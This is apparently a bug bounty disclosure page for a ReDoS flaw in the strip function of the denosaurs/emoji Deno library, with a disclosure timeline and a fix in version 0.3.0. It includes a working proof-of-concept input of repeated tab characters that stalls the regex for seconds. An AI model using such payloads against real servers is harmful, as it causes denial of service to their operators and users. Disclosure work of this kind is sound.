ReDoS vulnerability in `strip` function in denosaurs/emoji

Valid

Reported on

Apr 15th 2023


Description

The reTrimSpace regex has 2nd degree polynomial inefficiency, leading to a delayed response given a big payload.

Proof of Concept

import * as emoji from "https://deno.land/x/emoji@0.2.1/mod.ts";

const input = '\x00' + '\t'.repeat(154773) + '\t\x00';
const start = performance.now();
emoji.strip(input);
const end = performance.now();
console.log(Number(end - start).toString());

This usually takes ~12 seconds on a fast PC model.

Impact

Exploiting this vulnerability successfully can lead to staggered delays on a server.

We are processing your report and will contact the denosaurs/emoji team within 24 hours. a month ago
Tristan F. modified the report
a month ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
We have contacted a member of the denosaurs/emoji team and are waiting to hear back a month ago
We have sent a follow up to the denosaurs/emoji team. We will try again in 7 days. a month ago
denosaurs/emoji maintainer validated this vulnerability a month ago
Tristan F. has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
denosaurs/emoji maintainer marked this as fixed in 0.3.0 with commit a61ec1 a month ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
denosaurs/emoji maintainer published this vulnerability a month ago
to join this conversation